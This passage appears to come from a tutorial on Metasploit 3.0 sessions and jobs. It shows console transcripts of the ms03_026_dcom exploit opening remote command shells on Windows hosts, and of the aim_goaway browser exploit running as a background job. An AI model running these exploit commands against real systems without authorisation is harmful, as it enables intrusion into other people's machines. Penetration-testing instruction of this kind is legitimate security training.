New in Metasploit 3.0 are the concepts of sessions and jobs. In prior releases, interactive shells or other tasks would take control of the terminal, preventing other interaction with Metasploit until the task completed. Now, interactive shells and other payloads are wrapped in sessions that can be suspended and resumed. Similarly, exploits that require running a server, such as browser exploits that rely on tricking a user into connecting to Metasploit's web server, are managed as jobs that run in the background. By using sessions and jobs, you can now perform multiple exploits at once in a single Metasploit instance.
Sessions are automatically created for you when you use interactive payloads such as the shell or Meterpreter payloads (see The Meterpreter). When a session is created, the session ID is printed as part of the exploit output:
msf exploit(ms03_026_dcom) >exploit[*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:yakima[135] ... [*] Sending exploit ... [*] Sending stage (474 bytes)[*] Command shell session 1 opened (10.150.9.46:59996 -> 10.157.6.231:4444)[*] The DCERPC service did not reply to our request Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
The newly created session is immediately active, and your keyboard input is passed directly to the session. If you want to continue using Metasploit but don't want to close the session, you can type ^Z (Ctrl-Z) to put the session in the "background." This returns you to the Metasploit console but leaves the session running:
C:\WINDOWS\system32>cd c:\cd c:\ C:\>^ZBackground session 1? [y/N]ymsf exploit(ms03_026_dcom) >
Now that you're back at the Metasploit prompt, you're free to continue to use Metasploit to exploit additional machines and even create new sessions:
msf exploit(ms03_026_dcom) >set RHOST snakeRHOST => 10.157.6.140 msf exploit(ms03_026_dcom) >exploit[*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ... [*] Sending exploit ... [*] Sending stage (474 bytes) [*] The DCERPC service did not reply to our request[*] Command shell session 2 opened (10.150.9.46:60054 -> 10.157.6.140:4444)Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>^ZBackground session 2? [y/N]ymsf exploit(ms03_026_dcom) >
You can get a list of active sessions by typing sessions -l. The listing tells you which payload is active, as well as the IP addresses and ports involved. Here you can see the two sessions we created and put into the background:
msf exploit(ms03_026_dcom) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 10.150.9.46:59996 -> 10.157.6.231:4444
2 Command shell 10.150.9.46:60054 -> 10.157.6.140:4444You can resume a session where you left off by typing sessions -i sessionid:
msf exploit(ms03_026_dcom) >sessions -i 2[*] Starting interaction with 2... C:\WINNT\system32>exitexit^CAbort session 2? [y/N]y
As you can see in this example, sometimes shells don't exit cleanly, and fail to return you to the Metasploit prompt. If you ever need to terminate a session, as in the preceding case, you can type ^C (Ctrl-C) to abort the session.
Jobs are similar to sessions, but are created by any tasks that need to run in the background. Exploits that run servers that wait for client connections are one example of job creation. The code that follows offers an example of a job being created when we run a browser exploit.
msf >use exploit/windows/browser/aim_goawaymsf exploit(aim_goaway) >set PAYLOAD windows/shell/bind_tcpPAYLOAD => windows/shell/bind_tcp msf exploit(aim_goaway) >exploit[*] Using URL: http://192.168.10.10:8080/HKkUJ441 [*] Server started.[*] Exploit running as background job.
Active jobs can be listed by typing jobs -l from the command prompt. A list of jobs is displayed along with a job ID. Job IDs can be used with the -k flag to terminate running jobs. Here is an example of listing jobs, then killing one using the job ID:
msf exploit(aim_goaway) >jobs -lJobs ==== Id Name -- ----0 Exploit: windows/browser/aim_goawaymsf exploit(aim_goaway) >jobs -k0Stopping job: 0... msf exploit(aim_goaway) >jobs -lJobs ====No active jobs.
The special flag -K is provided if you want to kill all running jobs simultaneously.
Any output from the background job will be printed to the console. If the job is an exploit that manages to successfully compromise a client, a session will be created and automatically placed in the background. The session can be listed and resumed using the commands detailed in the earlier section "Sessions." Here's an example of a job spawning a session:
msf exploit(aim_goaway) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0. 0.1:50018) msf exploit(aim_goaway) >sessions -lActive sessions =============== Id Description Tunnel -- ----------- ------1 Command shell 127.0.0.1:4444 -> 127.0.0.1:50018